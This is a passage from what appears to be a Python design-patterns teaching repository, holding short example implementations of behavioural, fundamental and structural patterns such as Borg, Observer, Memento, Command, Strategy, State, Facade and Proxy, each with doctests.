""" from typing import Dict class Borg: _shared_state: Dict[str, str] = {} def __init__(self) -> None: self.__dict__ = self._shared_state class YourBorg(Borg): def __init__(self, state: str = None) -> None: super().__init__() if state: self.state = state else: # initiate the first instance with default state if not hasattr(self, "state"): self.state = "Init" def __str__(self) -> str: return self.state def main(): """ >>> rm1 = YourBorg() >>> rm2 = YourBorg() >>> rm1.state = 'Idle' >>> rm2.state = 'Running' >>> print('rm1: {0}'.format(rm1)) rm1: Running >>> print('rm2: {0}'.format(rm2)) rm2: Running # When the `state` attribute is modified from instance `rm2`, # the value of `state` in instance `rm1` also changes >>> rm2.state = 'Zombie' >>> print('rm1: {0}'.format(rm1)) rm1: Zombie >>> print('rm2: {0}'.format(rm2)) rm2: Zombie # Even though `rm1` and `rm2` share attributes, the instances are not the same >>> rm1 is rm2 False # New instances also get the same shared state >>> rm3 = YourBorg() >>> print('rm1: {0}'.format(rm1)) rm1: Zombie >>> print('rm2: {0}'.format(rm2)) rm2: Zombie >>> print('rm3: {0}'.format(rm3)) rm3: Zombie # A new instance can explicitly change the state during creation >>> rm4 = YourBorg('Running') >>> print('rm4: {0}'.format(rm4)) rm4: Running # Existing instances reflect that change as well >>> print('rm3: {0}'.format(rm3)) rm3: Running """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/observer.py """ http://code.activestate.com/recipes/131499-observer-pattern/ *TL;DR Maintains a list of dependents and notifies them of any state changes. *Examples in Python ecosystem: Django Signals: https://docs.djangoproject.com/en/3.1/topics/signals/ Flask Signals: https://flask.palletsprojects.com/en/1.1.x/signals/ """ from __future__ import annotations from contextlib import suppress from typing import Protocol # define a generic observer type class Observer(Protocol): def update(self, subject: Subject) -> None: pass class Subject: def __init__(self) -> None: self._observers: list[Observer] = [] def attach(self, observer: Observer) -> None: if observer not in self._observers: self._observers.append(observer) def detach(self, observer: Observer) -> None: with suppress(ValueError): self._observers.remove(observer) def notify(self, modifier: Observer | None = None) -> None: for observer in self._observers: if modifier != observer: observer.update(self) class Data(Subject): def __init__(self, name: str = "") -> None: super().__init__() self.name = name self._data = 0 @property def data(self) -> int: return self._data @data.setter def data(self, value: int) -> None: self._data = value self.notify() class HexViewer: def update(self, subject: Data) -> None: print(f"HexViewer: Subject {subject.name} has data 0x{subject.data:x}") class DecimalViewer: def update(self, subject: Data) -> None: print(f"DecimalViewer: Subject {subject.name} has data {subject.data}") def main(): """ >>> data1 = Data('Data 1') >>> data2 = Data('Data 2') >>> view1 = DecimalViewer() >>> view2 = HexViewer() >>> data1.attach(view1) >>> data1.attach(view2) >>> data2.attach(view2) >>> data2.attach(view1) >>> data1.data = 10 DecimalViewer: Subject Data 1 has data 10 HexViewer: Subject Data 1 has data 0xa >>> data2.data = 15 HexViewer: Subject Data 2 has data 0xf DecimalViewer: Subject Data 2 has data 15 >>> data1.data = 3 DecimalViewer: Subject Data 1 has data 3 HexViewer: Subject Data 1 has data 0x3 >>> data2.data = 5 HexViewer: Subject Data 2 has data 0x5 DecimalViewer: 
Subject Data 2 has data 5 # Detach HexViewer from data1 and data2 >>> data1.detach(view2) >>> data2.detach(view2) >>> data1.data = 10 DecimalViewer: Subject Data 1 has data 10 >>> data2.data = 15 DecimalViewer: Subject Data 2 has data 15 """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/catalog.py """ A class that uses different static function depending of a parameter passed in init. Note the use of a single dictionary instead of multiple conditions """ __author__ = "Ibrahim Diop <[email protected]>" class Catalog: """catalog of multiple static methods that are executed depending on an init parameter """ def __init__(self, param: str) -> None: # dictionary that will be used to determine which static method is # to be executed but that will be also used to store possible param # value self._static_method_choices = { "param_value_1": self._static_method_1, "param_value_2": self._static_method_2, } # simple test to validate param value if param in self._static_method_choices.keys(): self.param = param else: raise ValueError(f"Invalid Value for Param: {param}") @staticmethod def _static_method_1() -> None: print("executed method 1!") @staticmethod def _static_method_2() -> None: print("executed method 2!") def main_method(self) -> None: """will execute either _static_method_1 or _static_method_2 depending on self.param value """ self._static_method_choices[self.param]() # Alternative implementation for different levels of methods class CatalogInstance: """catalog of multiple methods that are executed depending on an init parameter """ def __init__(self, param: str) -> None: self.x1 = "x1" self.x2 = "x2" # simple test to validate param value if param in self._instance_method_choices: self.param = param else: raise ValueError(f"Invalid Value for Param: {param}") def _instance_method_1(self) -> None: print(f"Value {self.x1}") def _instance_method_2(self) -> None: print(f"Value {self.x2}") _instance_method_choices = { "param_value_1": _instance_method_1, "param_value_2": _instance_method_2, } def main_method(self) -> None: """will execute either _instance_method_1 or _instance_method_2 depending on self.param value """ self._instance_method_choices[self.param].__get__(self)() # type: ignore # type ignore reason: https://github.com/python/mypy/issues/10206 class CatalogClass: """catalog of multiple class methods that are executed depending on an init parameter """ x1 = "x1" x2 = "x2" def __init__(self, param: str) -> None: # simple test to validate param value if param in self._class_method_choices: self.param = param else: raise ValueError(f"Invalid Value for Param: {param}") @classmethod def _class_method_1(cls) -> None: print(f"Value {cls.x1}") @classmethod def _class_method_2(cls) -> None: print(f"Value {cls.x2}") _class_method_choices = { "param_value_1": _class_method_1, "param_value_2": _class_method_2, } def main_method(self): """will execute either _class_method_1 or _class_method_2 depending on self.param value """ self._class_method_choices[self.param].__get__(None, self.__class__)() # type: ignore # type ignore reason: https://github.com/python/mypy/issues/10206 class CatalogStatic: """catalog of multiple static methods that are executed depending on an init parameter """ def __init__(self, param: str) -> None: # simple test to validate param value if param in self._static_method_choices: self.param = param else: raise ValueError(f"Invalid Value for Param: {param}") @staticmethod def _static_method_1() -> None: print("executed method 1!") 
@staticmethod def _static_method_2() -> None: print("executed method 2!") _static_method_choices = { "param_value_1": _static_method_1, "param_value_2": _static_method_2, } def main_method(self) -> None: """will execute either _static_method_1 or _static_method_2 depending on self.param value """ self._static_method_choices[self.param].__get__(None, self.__class__)() # type: ignore # type ignore reason: https://github.com/python/mypy/issues/10206 def main(): """ >>> test = Catalog('param_value_2') >>> test.main_method() executed method 2! >>> test = CatalogInstance('param_value_1') >>> test.main_method() Value x1 >>> test = CatalogClass('param_value_2') >>> test.main_method() Value x2 >>> test = CatalogStatic('param_value_1') >>> test.main_method() executed method 1! """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/memento.py """ http://code.activestate.com/recipes/413838-memento-closure/ *TL;DR Provides the ability to restore an object to its previous state. """ from copy import copy, deepcopy from typing import Callable, List def memento(obj, deep=False): state = deepcopy(obj.__dict__) if deep else copy(obj.__dict__) def restore(): obj.__dict__.clear() obj.__dict__.update(state) return restore class Transaction: """A transaction guard. This is, in fact, just syntactic sugar around a memento closure. """ deep = False states: List[Callable[[], None]] = [] def __init__(self, deep, *targets): self.deep = deep self.targets = targets self.commit() def commit(self): self.states = [memento(target, self.deep) for target in self.targets] def rollback(self): for a_state in self.states: a_state() def Transactional(method): """Adds transactional semantics to methods. Methods decorated with @Transactional will roll back to entry-state upon exceptions. :param method: The function to be decorated. """ def transaction(obj, *args, **kwargs): state = memento(obj) try: return method(obj, *args, **kwargs) except Exception as e: state() raise e return transaction class NumObj: def __init__(self, value): self.value = value def __repr__(self): return f"<{self.__class__.__name__}: {self.value!r}>" def increment(self): self.value += 1 @Transactional def do_stuff(self): self.value = "1111" # <- invalid value self.increment() # <- will fail and rollback def main(): """ >>> num_obj = NumObj(-1) >>> print(num_obj) <NumObj: -1> >>> a_transaction = Transaction(True, num_obj) >>> try: ... for i in range(3): ... num_obj.increment() ... print(num_obj) ... a_transaction.commit() ... print('-- committed') ... for i in range(3): ... num_obj.increment() ... print(num_obj) ... num_obj.value += 'x' # will fail ... print(num_obj) ... except Exception: ... a_transaction.rollback() ... print('-- rolled back') <NumObj: 0> <NumObj: 1> <NumObj: 2> -- committed <NumObj: 3> <NumObj: 4> <NumObj: 5> -- rolled back >>> print(num_obj) <NumObj: 2> >>> print('-- now doing stuff ...') -- now doing stuff ... >>> try: ... num_obj.do_stuff() ... except Exception: ... print('-> doing stuff failed!') ... import sys ... import traceback ... traceback.print_exc(file=sys.stdout) -> doing stuff failed! Traceback (most recent call last): ... TypeError: ...str...int... >>> print(num_obj) <NumObj: 2> """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/behavioral/command.py """ Command pattern decouples the object invoking a job from the one who knows how to do it. As mentioned in the GoF book, a good example is in menu items. 
You have a menu that has lots of items. Each item is responsible for doing a special thing and you want your menu item just call the execute method when it is pressed. To achieve this you implement a command object with the execute method for each menu item and pass to it. *About the example We have a menu containing two items. Each item accepts a file name, one hides the file and the other deletes it. Both items have an undo option. Each item is a MenuItem class that accepts the corresponding command as input and executes it's execute method when it is pressed. *TL;DR Object oriented implementation of callback functions. *Examples in Python ecosystem: Django HttpRequest (without execute method): https://docs.djangoproject.com/en/2.1/ref/request-response/#httprequest-objects """ from typing import List, Union class HideFileCommand: """ A command to hide a file given its name """ def __init__(self) -> None: # an array of files hidden, to undo them as needed self._hidden_files: List[str] = [] def execute(self, filename: str) -> None: print(f"hiding {filename}") self._hidden_files.append(filename) def undo(self) -> None: filename = self._hidden_files.pop() print(f"un-hiding {filename}") class DeleteFileCommand: """ A command to delete a file given its name """ def __init__(self) -> None: # an array of deleted files, to undo them as needed self._deleted_files: List[str] = [] def execute(self, filename: str) -> None: print(f"deleting {filename}") self._deleted_files.append(filename) def undo(self) -> None: filename = self._deleted_files.pop() print(f"restoring {filename}") class MenuItem: """ The invoker class. Here it is items in a menu. """ def __init__(self, command: Union[HideFileCommand, DeleteFileCommand]) -> None: self._command = command def on_do_press(self, filename: str) -> None: self._command.execute(filename) def on_undo_press(self) -> None: self._command.undo() def main(): """ >>> item1 = MenuItem(DeleteFileCommand()) >>> item2 = MenuItem(HideFileCommand()) # create a file named `test-file` to work with >>> test_file_name = 'test-file' # deleting `test-file` >>> item1.on_do_press(test_file_name) deleting test-file # restoring `test-file` >>> item1.on_undo_press() restoring test-file # hiding `test-file` >>> item2.on_do_press(test_file_name) hiding test-file # un-hiding `test-file` >>> item2.on_undo_press() un-hiding test-file """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/registry.py from typing import Dict class RegistryHolder(type): REGISTRY: Dict[str, "RegistryHolder"] = {} def __new__(cls, name, bases, attrs): new_cls = type.__new__(cls, name, bases, attrs) """ Here the name of the class is used as key but it could be any class parameter. """ cls.REGISTRY[new_cls.__name__] = new_cls return new_cls @classmethod def get_registry(cls): return dict(cls.REGISTRY) class BaseRegisteredClass(metaclass=RegistryHolder): """ Any class that will inherits from BaseRegisteredClass will be included inside the dict RegistryHolder.REGISTRY, the key being the name of the class and the associated value, the class itself. """ def main(): """ Before subclassing >>> sorted(RegistryHolder.REGISTRY) ['BaseRegisteredClass'] >>> class ClassRegistree(BaseRegisteredClass): ... def __init__(self, *args, **kwargs): ... 
pass After subclassing >>> sorted(RegistryHolder.REGISTRY) ['BaseRegisteredClass', 'ClassRegistree'] """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/behavioral/mediator.py """ https://www.djangospin.com/design-patterns-python/mediator/ Objects in a system communicate through a Mediator instead of directly with each other. This reduces the dependencies between communicating objects, thereby reducing coupling. *TL;DR Encapsulates how a set of objects interact. """ from __future__ import annotations class ChatRoom: """Mediator class""" def display_message(self, user: User, message: str) -> None: print(f"[{user} says]: {message}") class User: """A class whose instances want to interact with each other""" def __init__(self, name: str) -> None: self.name = name self.chat_room = ChatRoom() def say(self, message: str) -> None: self.chat_room.display_message(self, message) def __str__(self) -> str: return self.name def main(): """ >>> molly = User('Molly') >>> mark = User('Mark') >>> ethan = User('Ethan') >>> molly.say("Hi Team! Meeting at 3 PM today.") [Molly says]: Hi Team! Meeting at 3 PM today. >>> mark.say("Roger that!") [Mark says]: Roger that! >>> ethan.say("Alright.") [Ethan says]: Alright. """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/__init__.py File: patterns/behavioral/strategy.py """ *What is this pattern about? Define a family of algorithms, encapsulate each one, and make them interchangeable. Strategy lets the algorithm vary independently from clients that use it. *TL;DR Enables selecting an algorithm at runtime. """ from __future__ import annotations from typing import Callable class DiscountStrategyValidator: # Descriptor class for check perform @staticmethod def validate(obj: Order, value: Callable) -> bool: try: if obj.price - value(obj) < 0: raise ValueError( f"Discount cannot be applied due to negative price resulting. 
{value.__name__}" ) except ValueError as ex: print(str(ex)) return False else: return True def __set_name__(self, owner, name: str) -> None: self.private_name = f"_{name}" def __set__(self, obj: Order, value: Callable = None) -> None: if value and self.validate(obj, value): setattr(obj, self.private_name, value) else: setattr(obj, self.private_name, None) def __get__(self, obj: object, objtype: type = None): return getattr(obj, self.private_name) class Order: discount_strategy = DiscountStrategyValidator() def __init__(self, price: float, discount_strategy: Callable = None) -> None: self.price: float = price self.discount_strategy = discount_strategy def apply_discount(self) -> float: if self.discount_strategy: discount = self.discount_strategy(self) else: discount = 0 return self.price - discount def __repr__(self) -> str: strategy = getattr(self.discount_strategy, "__name__", None) return f"<Order price: {self.price} with discount strategy: {strategy}>" def ten_percent_discount(order: Order) -> float: return order.price * 0.10 def on_sale_discount(order: Order) -> float: return order.price * 0.25 + 20 def main(): """ >>> order = Order(100, discount_strategy=ten_percent_discount) >>> print(order) <Order price: 100 with discount strategy: ten_percent_discount> >>> print(order.apply_discount()) 90.0 >>> order = Order(100, discount_strategy=on_sale_discount) >>> print(order) <Order price: 100 with discount strategy: on_sale_discount> >>> print(order.apply_discount()) 55.0 >>> order = Order(10, discount_strategy=on_sale_discount) Discount cannot be applied due to negative price resulting. on_sale_discount >>> print(order) <Order price: 10 with discount strategy: None> """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/iterator_alt.py """ Implementation of the iterator pattern using the iterator protocol from Python *TL;DR Traverses a container and accesses the container's elements. """ from __future__ import annotations class NumberWords: """Counts by word numbers, up to a maximum of five""" _WORD_MAP = ( "one", "two", "three", "four", "five", ) def __init__(self, start: int, stop: int) -> None: self.start = start self.stop = stop def __iter__(self) -> NumberWords: # this makes the class an Iterable return self def __next__(self) -> str: # this makes the class an Iterator if self.start > self.stop or self.start > len(self._WORD_MAP): raise StopIteration current = self.start self.start += 1 return self._WORD_MAP[current - 1] # Test the iterator def main(): """ # Counting to two... >>> for number in NumberWords(start=1, stop=2): ... print(number) one two # Counting to five... >>> for number in NumberWords(start=1, stop=5): ... print(number) one two three four five """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/visitor.py """ http://peter-hoffmann.com/2010/extrinsic-visitor-pattern-python-inheritance.html *TL;DR Separates an algorithm from an object structure on which it operates. An interesting recipe could be found in Brian Jones, David Beazley "Python Cookbook" (2013): - "8.21. Implementing the Visitor Pattern" - "8.22. Implementing the Visitor Pattern Without Recursion" *Examples in Python ecosystem: - Python's ast.NodeVisitor: https://github.com/python/cpython/blob/master/Lib/ast.py#L250 which is then being used e.g. in tools like `pyflakes`. 
- `Black` formatter tool implements it's own: https://github.com/ambv/black/blob/master/black.py#L718 """ class Node: pass class A(Node): pass class B(Node): pass class C(A, B): pass class Visitor: def visit(self, node, *args, **kwargs): meth = None for cls in node.__class__.__mro__: meth_name = "visit_" + cls.__name__ meth = getattr(self, meth_name, None) if meth: break if not meth: meth = self.generic_visit return meth(node, *args, **kwargs) def generic_visit(self, node, *args, **kwargs): print("generic_visit " + node.__class__.__name__) def visit_B(self, node, *args, **kwargs): print("visit_B " + node.__class__.__name__) def main(): """ >>> a, b, c = A(), B(), C() >>> visitor = Visitor() >>> visitor.visit(a) generic_visit A >>> visitor.visit(b) visit_B B >>> visitor.visit(c) visit_B C """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/iterator.py """ http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/ Implementation of the iterator pattern with a generator *TL;DR Traverses a container and accesses the container's elements. """ def count_to(count: int): """Counts by word numbers, up to a maximum of five""" numbers = ["one", "two", "three", "four", "five"] yield from numbers[:count] # Test the generator def count_to_two() -> None: return count_to(2) def count_to_five() -> None: return count_to(5) def main(): """ # Counting to two... >>> for number in count_to_two(): ... print(number) one two # Counting to five... >>> for number in count_to_five(): ... print(number) one two three four five """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/specification.py """ @author: Gordeev Andrey <[email protected]> *TL;DR Provides recombination business logic by chaining together using boolean logic. 
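
Composite specifications are built by wrapping simpler ones; roughly, using
the classes defined below (``candidate`` stands for any object under test)::

    spec = UserSpecification().and_specification(SuperUserSpecification())
    spec.is_satisfied_by(candidate)   # True only when both parts are satisfied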
""" from abc import abstractmethod class Specification: def and_specification(self, candidate): raise NotImplementedError() def or_specification(self, candidate): raise NotImplementedError() def not_specification(self): raise NotImplementedError() @abstractmethod def is_satisfied_by(self, candidate): pass class CompositeSpecification(Specification): @abstractmethod def is_satisfied_by(self, candidate): pass def and_specification(self, candidate): return AndSpecification(self, candidate) def or_specification(self, candidate): return OrSpecification(self, candidate) def not_specification(self): return NotSpecification(self) class AndSpecification(CompositeSpecification): def __init__(self, one, other): self._one: Specification = one self._other: Specification = other def is_satisfied_by(self, candidate): return bool( self._one.is_satisfied_by(candidate) and self._other.is_satisfied_by(candidate) ) class OrSpecification(CompositeSpecification): def __init__(self, one, other): self._one: Specification = one self._other: Specification = other def is_satisfied_by(self, candidate): return bool( self._one.is_satisfied_by(candidate) or self._other.is_satisfied_by(candidate) ) class NotSpecification(CompositeSpecification): def __init__(self, wrapped): self._wrapped: Specification = wrapped def is_satisfied_by(self, candidate): return bool(not self._wrapped.is_satisfied_by(candidate)) class User: def __init__(self, super_user=False): self.super_user = super_user class UserSpecification(CompositeSpecification): def is_satisfied_by(self, candidate): return isinstance(candidate, User) class SuperUserSpecification(CompositeSpecification): def is_satisfied_by(self, candidate): return getattr(candidate, "super_user", False) def main(): """ >>> andrey = User() >>> ivan = User(super_user=True) >>> vasiliy = 'not User instance' >>> root_specification = UserSpecification().and_specification(SuperUserSpecification()) # Is specification satisfied by <name> >>> root_specification.is_satisfied_by(andrey), 'andrey' (False, 'andrey') >>> root_specification.is_satisfied_by(ivan), 'ivan' (True, 'ivan') >>> root_specification.is_satisfied_by(vasiliy), 'vasiliy' (False, 'vasiliy') """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/template.py """ An example of the Template pattern in Python *TL;DR Defines the skeleton of a base algorithm, deferring definition of exact steps to subclasses. *Examples in Python ecosystem: Django class based views: https://docs.djangoproject.com/en/2.1/topics/class-based-views/ """ def get_text() -> str: return "plain-text" def get_pdf() -> str: return "pdf" def get_csv() -> str: return "csv" def convert_to_text(data: str) -> str: print("[CONVERT]") return f"{data} as text" def saver() -> None: print("[SAVE]") def template_function(getter, converter=False, to_save=False) -> None: data = getter() print(f"Got `{data}`") if len(data) <= 3 and converter: data = converter(data) else: print("Skip conversion") if to_save: saver() print(f"`{data}` was processed") def main(): """ >>> template_function(get_text, to_save=True) Got `plain-text` Skip conversion [SAVE] `plain-text` was processed >>> template_function(get_pdf, converter=convert_to_text) Got `pdf` [CONVERT] `pdf as text` was processed >>> template_function(get_csv, to_save=True) Got `csv` Skip conversion [SAVE] `csv` was processed """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/chain_of_responsibility.py """ *What is this pattern about? 
The Chain of responsibility is an object oriented version of the `if ... elif ... elif ... else ...` idiom, with the benefit that the condition–action blocks can be dynamically rearranged and reconfigured at runtime. This pattern aims to decouple the senders of a request from its receivers by allowing request to move through chained receivers until it is handled. Request receiver in simple form keeps a reference to a single successor. As a variation some receivers may be capable of sending requests out in several directions, forming a `tree of responsibility`. *TL;DR Allow a request to pass down a chain of receivers until it is handled. """ from abc import ABC, abstractmethod from typing import Optional, Tuple class Handler(ABC): def __init__(self, successor: Optional["Handler"] = None): self.successor = successor def handle(self, request: int) -> None: """ Handle request and stop. If can't - call next handler in chain. As an alternative you might even in case of success call the next handler. """ res = self.check_range(request) if not res and self.successor: self.successor.handle(request) @abstractmethod def check_range(self, request: int) -> Optional[bool]: """Compare passed value to predefined interval""" class ConcreteHandler0(Handler): """Each handler can be different. Be simple and static... """ @staticmethod def check_range(request: int) -> Optional[bool]: if 0 <= request < 10: print(f"request {request} handled in handler 0") return True return None class ConcreteHandler1(Handler): """... With it's own internal state""" start, end = 10, 20 def check_range(self, request: int) -> Optional[bool]: if self.start <= request < self.end: print(f"request {request} handled in handler 1") return True return None class ConcreteHandler2(Handler): """... With helper methods.""" def check_range(self, request: int) -> Optional[bool]: start, end = self.get_interval_from_db() if start <= request < end: print(f"request {request} handled in handler 2") return True return None @staticmethod def get_interval_from_db() -> Tuple[int, int]: return (20, 30) class FallbackHandler(Handler): @staticmethod def check_range(request: int) -> Optional[bool]: print(f"end of chain, no handler for {request}") return False def main(): """ >>> h0 = ConcreteHandler0() >>> h1 = ConcreteHandler1() >>> h2 = ConcreteHandler2(FallbackHandler()) >>> h0.successor = h1 >>> h1.successor = h2 >>> requests = [2, 5, 14, 22, 18, 3, 35, 27, 20] >>> for request in requests: ... 
h0.handle(request) request 2 handled in handler 0 request 5 handled in handler 0 request 14 handled in handler 1 request 22 handled in handler 2 request 18 handled in handler 1 request 3 handled in handler 0 end of chain, no handler for 35 request 27 handled in handler 2 request 20 handled in handler 2 """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/behavioral/publish_subscribe.py """ Reference: http://www.slideshare.net/ishraqabd/publish-subscribe-model-overview-13368808 Author: https://github.com/HanWenfang """ from __future__ import annotations class Provider: def __init__(self) -> None: self.msg_queue = [] self.subscribers = {} def notify(self, msg: str) -> None: self.msg_queue.append(msg) def subscribe(self, msg: str, subscriber: Subscriber) -> None: self.subscribers.setdefault(msg, []).append(subscriber) def unsubscribe(self, msg: str, subscriber: Subscriber) -> None: self.subscribers[msg].remove(subscriber) def update(self) -> None: for msg in self.msg_queue: for sub in self.subscribers.get(msg, []): sub.run(msg) self.msg_queue = [] class Publisher: def __init__(self, msg_center: Provider) -> None: self.provider = msg_center def publish(self, msg: str) -> None: self.provider.notify(msg) class Subscriber: def __init__(self, name: str, msg_center: Provider) -> None: self.name = name self.provider = msg_center def subscribe(self, msg: str) -> None: self.provider.subscribe(msg, self) def unsubscribe(self, msg: str) -> None: self.provider.unsubscribe(msg, self) def run(self, msg: str) -> None: print(f"{self.name} got {msg}") def main(): """ >>> message_center = Provider() >>> fftv = Publisher(message_center) >>> jim = Subscriber("jim", message_center) >>> jim.subscribe("cartoon") >>> jack = Subscriber("jack", message_center) >>> jack.subscribe("music") >>> gee = Subscriber("gee", message_center) >>> gee.subscribe("movie") >>> vani = Subscriber("vani", message_center) >>> vani.subscribe("movie") >>> vani.unsubscribe("movie") # Note that no one subscribed to `ads` # and that vani changed their mind >>> fftv.publish("cartoon") >>> fftv.publish("music") >>> fftv.publish("ads") >>> fftv.publish("movie") >>> fftv.publish("cartoon") >>> fftv.publish("cartoon") >>> fftv.publish("movie") >>> fftv.publish("blank") >>> message_center.update() jim got cartoon jack got music gee got movie jim got cartoon jim got cartoon gee got movie """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/state.py """ Implementation of the state pattern http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/ *TL;DR Implements state as a derived class of the state pattern interface. Implements state transitions by invoking methods from the pattern's superclass. """ from __future__ import annotations class State: """Base state. This is to share functionality""" def scan(self) -> None: """Scan the dial to the next station""" self.pos += 1 if self.pos == len(self.stations): self.pos = 0 print(f"Scanning... 
Station is {self.stations[self.pos]} {self.name}") class AmState(State): def __init__(self, radio: Radio) -> None: self.radio = radio self.stations = ["1250", "1380", "1510"] self.pos = 0 self.name = "AM" def toggle_amfm(self) -> None: print("Switching to FM") self.radio.state = self.radio.fmstate class FmState(State): def __init__(self, radio: Radio) -> None: self.radio = radio self.stations = ["81.3", "89.1", "103.9"] self.pos = 0 self.name = "FM" def toggle_amfm(self) -> None: print("Switching to AM") self.radio.state = self.radio.amstate class Radio: """A radio. It has a scan button, and an AM/FM toggle switch.""" def __init__(self) -> None: """We have an AM state and an FM state""" self.amstate = AmState(self) self.fmstate = FmState(self) self.state = self.amstate def toggle_amfm(self) -> None: self.state.toggle_amfm() def scan(self) -> None: self.state.scan() def main(): """ >>> radio = Radio() >>> actions = [radio.scan] * 2 + [radio.toggle_amfm] + [radio.scan] * 2 >>> actions *= 2 >>> for action in actions: ... action() Scanning... Station is 1380 AM Scanning... Station is 1510 AM Switching to FM Scanning... Station is 89.1 FM Scanning... Station is 103.9 FM Scanning... Station is 81.3 FM Scanning... Station is 89.1 FM Switching to AM Scanning... Station is 1250 AM Scanning... Station is 1380 AM """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/behavioral/chaining_method.py from __future__ import annotations class Person: def __init__(self, name: str) -> None: self.name = name def do_action(self, action: Action) -> Action: print(self.name, action.name, end=" ") return action class Action: def __init__(self, name: str) -> None: self.name = name def amount(self, val: str) -> Action: print(val, end=" ") return self def stop(self) -> None: print("then stop") def main(): """ >>> move = Action('move') >>> person = Person('Jack') >>> person.do_action(move).amount('5m').stop() Jack move 5m then stop """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/fundamental/delegation_pattern.py """ Reference: https://en.wikipedia.org/wiki/Delegation_pattern Author: https://github.com/IuryAlves *TL;DR Allows object composition to achieve the same code reuse as inheritance. """ from __future__ import annotations from typing import Any, Callable class Delegator: """ >>> delegator = Delegator(Delegate()) >>> delegator.p1 123 >>> delegator.p2 Traceback (most recent call last): ... AttributeError: 'Delegate' object has no attribute 'p2' >>> delegator.do_something("nothing") 'Doing nothing' >>> delegator.do_anything() Traceback (most recent call last): ... AttributeError: 'Delegate' object has no attribute 'do_anything' """ def __init__(self, delegate: Delegate) -> None: self.delegate = delegate def __getattr__(self, name: str) -> Any | Callable: attr = getattr(self.delegate, name) if not callable(attr): return attr def wrapper(*args, **kwargs): return attr(*args, **kwargs) return wrapper class Delegate: def __init__(self) -> None: self.p1 = 123 def do_something(self, something: str) -> str: return f"Doing {something}" if __name__ == "__main__": import doctest doctest.testmod() File: patterns/fundamental/__init__.py File: patterns/structural/facade.py """ Example from https://en.wikipedia.org/wiki/Facade_pattern#Python *What is this pattern about? The Facade pattern is a way to provide a simpler unified interface to a more complex system. It provides an easier way to access functions of the underlying system by providing a single entry point. 
This kind of abstraction is seen in many real life situations. For example, we can turn on a computer by just pressing a button, but in fact there are many procedures and operations done when that happens (e.g., loading programs from disk to memory). In this case, the button serves as an unified interface to all the underlying procedures to turn on a computer. *Where is the pattern used practically? This pattern can be seen in the Python standard library when we use the isdir function. Although a user simply uses this function to know whether a path refers to a directory, the system makes a few operations and calls other modules (e.g., os.stat) to give the result. *References: https://sourcemaking.com/design_patterns/facade https://fkromer.github.io/python-pattern-references/design/#facade http://python-3-patterns-idioms-test.readthedocs.io/en/latest/ChangeInterface.html#facade *TL;DR Provides a simpler unified interface to a complex system. """ # Complex computer parts class CPU: """ Simple CPU representation. """ def freeze(self) -> None: print("Freezing processor.") def jump(self, position: str) -> None: print("Jumping to:", position) def execute(self) -> None: print("Executing.") class Memory: """ Simple memory representation. """ def load(self, position: str, data: str) -> None: print(f"Loading from {position} data: '{data}'.") class SolidStateDrive: """ Simple solid state drive representation. """ def read(self, lba: str, size: str) -> str: return f"Some data from sector {lba} with size {size}" class ComputerFacade: """ Represents a facade for various computer parts. """ def __init__(self): self.cpu = CPU() self.memory = Memory() self.ssd = SolidStateDrive() def start(self): self.cpu.freeze() self.memory.load("0x00", self.ssd.read("100", "1024")) self.cpu.jump("0x00") self.cpu.execute() def main(): """ >>> computer_facade = ComputerFacade() >>> computer_facade.start() Freezing processor. Loading from 0x00 data: 'Some data from sector 100 with size 1024'. Jumping to: 0x00 Executing. """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/structural/proxy.py """ *What is this pattern about? Proxy is used in places where you want to add functionality to a class without changing its interface. The main class is called `Real Subject`. A client should use the proxy or the real subject without any code change, so both must have the same interface. Logging and controlling access to the real subject are some of the proxy pattern usages. *References: https://refactoring.guru/design-patterns/proxy/python/example https://python-3-patterns-idioms-test.readthedocs.io/en/latest/Fronting.html *TL;DR Add functionality or logic (e.g. logging, caching, authorization) to a resource without changing its interface. """ from typing import Union class Subject: """ As mentioned in the document, interfaces of both RealSubject and Proxy should be the same, because the client should be able to use RealSubject or Proxy with no code change. Not all times this interface is necessary. The point is the client should be able to use RealSubject or Proxy interchangeably with no change in code. """ def do_the_job(self, user: str) -> None: raise NotImplementedError() class RealSubject(Subject): """ This is the main job doer. External services like payment gateways can be a good example. 
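
    Both the proxy and the real subject can be handed to the same client
    code, e.g. (mirroring the doctest in ``main``)::

        client(Proxy(), "admin")        # goes through the proxy's access check
        client(RealSubject(), "admin")  # calls the real subject directly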
""" def do_the_job(self, user: str) -> None: print(f"I am doing the job for {user}") class Proxy(Subject): def __init__(self) -> None: self._real_subject = RealSubject() def do_the_job(self, user: str) -> None: """ logging and controlling access are some examples of proxy usages. """ print(f"[log] Doing the job for {user} is requested.") if user == "admin": self._real_subject.do_the_job(user) else: print("[log] I can do the job just for `admins`.") def client(job_doer: Union[RealSubject, Proxy], user: str) -> None: job_doer.do_the_job(user) def main(): """ >>> proxy = Proxy() >>> real_subject = RealSubject() >>> client(proxy, 'admin') [log] Doing the job for admin is requested. I am doing the job for admin >>> client(proxy, 'anonymous') [log] Doing the job for anonymous is requested. [log] I can do the job just for `admins`. >>> client(real_subject, 'admin') I am doing the job for admin >>> client(real_subject, 'anonymous') I am doing the job for anonymous """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/structural/adapter.py """ *What is this pattern about? The Adapter pattern provides a different interface for a class. We can think about it as a cable adapter that allows you to 